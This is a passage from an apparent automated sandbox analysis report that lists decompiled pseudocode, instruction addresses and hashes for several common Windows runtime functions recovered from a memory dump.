				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1ad7b9c; // 0x0
				_t55 = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E01A3D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1ad7b10 =  *0x1ad7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x1ad536c; // 0x77f05368
					if( *_t51 != 0x1ad5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1ad5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x1ad536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E01A1A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x01a1a61c
0x01a1a61e
0x01a1a623
0x01a1a628
0x01a1a62b
0x01a1a62d
0x01a1a648
0x01a1a64a
0x01a1a64f
0x01a59b44
0x01a1a6ec
0x01a1a6f1
0x01a1a6f1
0x01a1a655
0x01a1a657
0x01a1a65a
0x01a1a65d
0x01a1a662
0x01a1a663
0x01a1a667
0x01a1a668
0x01a1a66d
0x01a1a706
0x01a1a706
0x01a59bda
0x01a59be6
0x01a59beb
0x00000000
0x01a59beb
0x01a1a679
0x01a59b7a
0x00000000
0x01a59b7a
0x01a1a683
0x01a1a6f4
0x01a1a6f7
0x01a1a6f9
0x01a1a6fd
0x01a1a6a0
0x01a1a6a0
0x01a1a6ad
0x01a1a6af
0x01a1a6b4
0x01a59ba7
0x01a59bac
0x00000000
0x00000000
0x01a59bc6
0x01a59bce
0x01a59bd1
0x01a59bd3
0x01a59bd3
0x00000000
0x01a59bd1
0x01a1a6bd
0x01a1a6c3
0x01a1a6c6
0x01a1a6d2
0x01a1a701
0x01a1a704
0x00000000
0x01a1a704
0x01a1a6d4
0x01a1a6d6
0x01a1a6d9
0x01a1a6db
0x01a1a6e1
0x01a1a6e6
0x01a1a6e8
0x01a1a6e8
0x01a1a6ea
0x00000000
0x01a1a6ea
0x01a1a688
0x01a1a692
0x01a1a694
0x01a1a699
0x00000000
0x00000000
0x01a1a69d
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d882ff0a8309ef6c7d3bb633740e212e5d028b7699267990a8e0b40c14f3c7
Instruction ID: cced89e55877b063df32d6ba031d951a9f8607e09c878346157a337c9596e5b3
Opcode Fuzzy Hash: f1d882ff0a8309ef6c7d3bb633740e212e5d028b7699267990a8e0b40c14f3c7
Instruction Fuzzy Hash: 4A418AB9A01245DFDB15CF58C990BA9BBF2BF89314F1980A9E916AF348C774A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A0C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01A0C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01A07D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01AB8D34(_v8, _t80);
					}
					E01A02280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E019FFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01AB8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E019FFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E01A2B180();
						if(_a4 != 0) {
							E01A02280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E01A0BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E01A0BB2D(_t16, _t15);
						E01A0B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E019FFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E019FFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E019FFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x01a0c18d
0x01a0c18f
0x01a0c191
0x01a0c19b
0x01a0c1a0
0x01a0c1d4
0x01a0c1de
0x01a52d6e
0x01a0c1e4
0x01a0c1e4
0x01a0c1e4
0x01a0c1ec
0x01a52d7d
0x01a52d7d
0x01a0c1f3
0x01a0c1ff
0x01a52d88
0x01a52d8d
0x01a52d94
0x01a52d94
0x01a52d9f
0x01a52da4
0x01a52dab
0x01a52db0
0x01a52db2
0x01a52db3
0x01a52db4
0x01a52dbc
0x01a52dc3
0x01a52dc3
0x01a0c205
0x01a0c205
0x01a0c208
0x01a0c20e
0x01a0c211
0x01a0c216
0x01a0c219
0x01a0c21f
0x01a0c222
0x01a0c22c
0x01a0c234
0x01a0c23a
0x01a0c23f
0x01a0c245
0x01a0c24b
0x01a0c251
0x01a0c25a
0x01a0c276
0x01a0c27d
0x01a0c27d
0x01a0c25c
0x01a0c25c
0x00000000
0x01a0c25e
0x01a0c1a4
0x01a0c1aa
0x01a0c1b3
0x01a0c265
0x01a0c26c
0x01a0c26c
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 33059eecf3121af801e050afe4858023f39fb65c1354fa0e68183ce5696f98b6
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: C9314B72A01647BFD706EBB4D580BE9FB64BF56310F08429AD51C47385DB346A49C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01A67016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01A67016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1add360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01A66B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01A66B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01A07D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01A29AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E01A2B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01A04620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01a67016
0x01a6701e
0x01a6702b
0x01a67033
0x01a67037
0x01a6703c
0x01a6703e
0x01a67041
0x01a67045
0x01a6704a
0x01a67050
0x01a67055
0x01a6705a
0x01a67062
0x01a67062
0x01a6705a
0x01a67064
0x01a67064
0x01a67067
0x01a67071
0x01a67096
0x01a6709b
0x01a670a2
0x01a670a6
0x01a670a7
0x01a670ad
0x01a670b3
0x01a670b6
0x01a670bb
0x01a670c3
0x01a670c3
0x01a670c6
0x01a670cd
0x01a670dd
0x01a670e0
0x01a670e2
0x01a670e2
0x01a670ee
0x01a67101
0x01a670f0
0x01a670f9
0x01a670f9
0x01a6710a
0x01a6710e
0x01a67112
0x01a67117
0x01a67118
0x01a67118
0x01a670bb
0x01a6711d
0x01a67123
0x01a67131
0x01a67131
0x01a67136
0x01a6713d
0x01a6713e
0x01a6713f
0x01a6714a
0x01a6714a
0x01a67084
0x01a67088
0x00000000
0x01a6708e
0x01a6708e
0x01a67092
0x00000000
0x01a67092

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715bac8f81bc7889d08acb95088ce1036e783d44f3588d155fd12ed21cfb0b71
Instruction ID: 05c915735d0cfa8dd37d30adc1d5fc3d826786795946c50997368bc2a8ef04ba
Opcode Fuzzy Hash: 715bac8f81bc7889d08acb95088ce1036e783d44f3588d155fd12ed21cfb0b71
Instruction Fuzzy Hash: E931C272604751DBC321DF6CC940A6AB7E9BF88714F054A29F99587690E730E904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 01A1A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E01A1A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1ad7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1ad7b10 = 8;
					 *0x1ad7b14 = 0x1ad7b0c;
					 *0x1ad7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E01A1A990(0x1ad7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L01A1A840(__edx, __ecx, __ecx, _t52, 0x1ad7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1ad7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1ad7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1ad7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01A04620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1ad7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E01A2F3E0(_t50,  *0x1ad7b14, _t8 >> 3);
						_t28 =  *0x1ad7b14; // 0x0
						__eflags = _t28 - 0x1ad7b0c;
						if(_t28 != 0x1ad7b0c) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1ad7b14 = _t50;
						_t48 = _v12;
						 *0x1ad7b10 = _t9;
						goto L6;
					}
					 *0x1ad7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x01a1a713
0x01a1a714
0x01a1a717
0x01a1a71d
0x01a1a720
0x01a1a722
0x01a1a727
0x01a1a74a
0x01a1a754
0x01a1a75e
0x01a1a768
0x01a1a76a
0x01a1a773
0x01a1a78b
0x01a1a790
0x01a1a792
0x01a1a741
0x01a1a741
0x01a1a743
0x01a1a749
0x01a1a749
0x01a1a732
0x01a1a73a
0x01a1a797
0x01a1a79d
0x01a1a7a3
0x01a1a7a9
0x01a1a7b6
0x01a1a7bc
0x01a1a7ca
0x01a1a7e0
0x01a1a7e2
0x01a1a7e4
0x01a59bf2
0x00000000
0x01a59bf2
0x01a1a7ed
0x01a1a7f2
0x01a1a800
0x01a1a805
0x01a1a80d
0x01a1a812
0x01a59c08
0x01a59c08
0x01a1a818
0x01a1a81b
0x01a1a821
0x01a1a824
0x00000000
0x01a1a824
0x01a1a7ae
0x00000000
0x01a1a7ae
0x01a1a73c
0x01a1a73e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da078dda8850940d7bbf9b0ce17169bc736fc641bff63fcbcb4f44a345610b9
Instruction ID: 043880e131100aca6335843b91559dd3875a86e0b058e3dbeac58a2479553d9c
Opcode Fuzzy Hash: 7da078dda8850940d7bbf9b0ce17169bc736fc641bff63fcbcb4f44a345610b9
Instruction Fuzzy Hash: AE3107B5602A41DFD729CF98DC80F257BF9FB84718F14495AEA47C7248D3709A02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A161A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01A161A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01A15E50(0x19c67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01AB9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E019EF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x01a161b3
0x01a161b5
0x01a161bd
0x01a161c3
0x01a161c7
0x01a161d2
0x01a161ff
0x01a161ff
0x01a16201
0x01a16207
0x01a16207
0x01a161d4
0x01a161d9
0x00000000
0x00000000
0x01a161df
0x01a161e2
0x00000000
0x00000000
0x01a161e6
0x01a161e8
0x01a161ee
0x01a161ee
0x01a161f9
0x01a5762f
0x01a57632
0x01a57635
0x01a57639
0x01a57640
0x01a5766e
0x01a57675
0x00000000
0x00000000
0x01a57681
0x01a57689
0x01a5768d
0x01a57691
0x01a57695
0x01a57699
0x01a576af
0x01a576b5
0x01a576b7
0x01a576b7
0x01a576d7
0x01a576dc
0x00000000
0x01a576dc
0x01a576a2
0x01a576a9
0x01a57651
0x01a57653
0x01a57653
0x01a57656
0x01a57656
0x00000000
0x01a57656
0x01a57644
0x01a57646
0x01a57648
0x01a57648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 970d1e6f1d5d67cdfb8e59e0edb5930f5e00f6ceb4f803b211f7e3b9317908b9
Instruction ID: cb61ece9f6a91d2b0fc67f497ce809f0a9db6aa2fb420d9641151cbf4561adc3
Opcode Fuzzy Hash: 970d1e6f1d5d67cdfb8e59e0edb5930f5e00f6ceb4f803b211f7e3b9317908b9
Instruction Fuzzy Hash: F4318F716093018FE360CF5DC940B26BBE5FB98B00F45496DE998EB751E7B0D804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 019EAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E019EAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1add360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1ad7b9c; // 0x0
					_t53 = L01A04620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E01A2B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E01A2F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L019F6C59(_t53, _t51, _t58) != 0) {
							_t28 = E01A15E50(0x19cc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E01A1B230(_v32, _v28, 0x19cc2d8, 1,  &_v24);
								_t28 = E019EF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x019eaa25
0x019eaa29
0x019eaa2d
0x019eaa30
0x019eaa37
0x019eaa3c
0x01a44458
0x01a44458
0x01a44472
0x01a44474
0x01a44476
0x019eaa64
0x019eaa74
0x01a4447c
0x01a44483
0x01a44492
0x019eaa52
0x019eaa54
0x019eaa5e
0x01a444a8
0x01a444ad
0x01a444af
0x01a444b6
0x01a444b6
0x01a444b9
0x01a444bc
0x01a444cd
0x01a444d3
0x01a444d6
0x01a444e1
0x01a444e1
0x01a444e6
0x01a444e8
0x01a444fb
0x01a444fb
0x01a444e8
0x00000000
0x019eaa5e
0x01a44476
0x019eaa42
0x019eaa46
0x019eaa48
0x019eaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbd28649032b81ae74bbca0d3b2b401a509df8bdd63276f4ebf413f279d80d59
Instruction ID: be8947ff924f424d597da7f1f155944ba9e04e3b10120ad5da497e2d6c688ca2
Opcode Fuzzy Hash: fbd28649032b81ae74bbca0d3b2b401a509df8bdd63276f4ebf413f279d80d59
Instruction Fuzzy Hash: 1A31C371A0061AABCB159FA8CE41ABFB7B9EF88700F01446AF905E7150E7749911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01A28EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01A28EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x1add360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01A14E70(0x1ad86e4, 0x1a29490, 0, 0);
					if( *0x1ad53e8 > 5 && E01A28F33(0x1ad53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x1ad53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x1ad53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x19cbc46;
						_t48 = E01A67B9C(0x1ad53e8, 0x19cbc46, _t67, 0x1ad53e8, _t70,  &_v140);
					}
				}
				return E01A2B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01a28ec7
0x01a28ed9
0x01a28edc
0x01a28ee6
0x01a28ee9
0x01a28eee
0x01a28efc
0x01a28f08
0x01a61349
0x01a61353
0x01a6135d
0x01a61366
0x01a6136f
0x01a61375
0x01a6137c
0x01a61385
0x01a61390
0x01a61391
0x01a6139c
0x01a6139d
0x01a613a6
0x01a613ac
0x01a613b2
0x01a613b5
0x01a613bc
0x01a613bf
0x01a613c2
0x01a613c5
0x01a613c8
0x01a613cb
0x01a613ce
0x01a613d1
0x01a613d4
0x01a613d7
0x01a613da
0x01a613dd
0x01a613e0
0x01a613e3
0x01a613e6
0x01a613e9
0x01a613f6
0x01a61400
0x01a61400
0x01a28f08
0x01a28f32

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56a2b7a6832fa0b8873a8b4e3d042e400bdda793b91db21e60989901d3741094
Instruction ID: 8567c955fd973777fe20b9b09cd4b75be069864f62e9861613a59d7088f18afd
Opcode Fuzzy Hash: 56a2b7a6832fa0b8873a8b4e3d042e400bdda793b91db21e60989901d3741094
Instruction Fuzzy Hash: A041A2B5D007289FDB20CFAAD981AADFBF4FB48710F5041AEE559A7240EB745A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A24A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E01A24A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x1add360 ^ _t62;
				_v8 =  *0x1add360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01A02280(_t26, 0x1ad8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E019FFFB0(_t41, _t51, 0x1ad8608);
						L2:
						 *0x1adb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
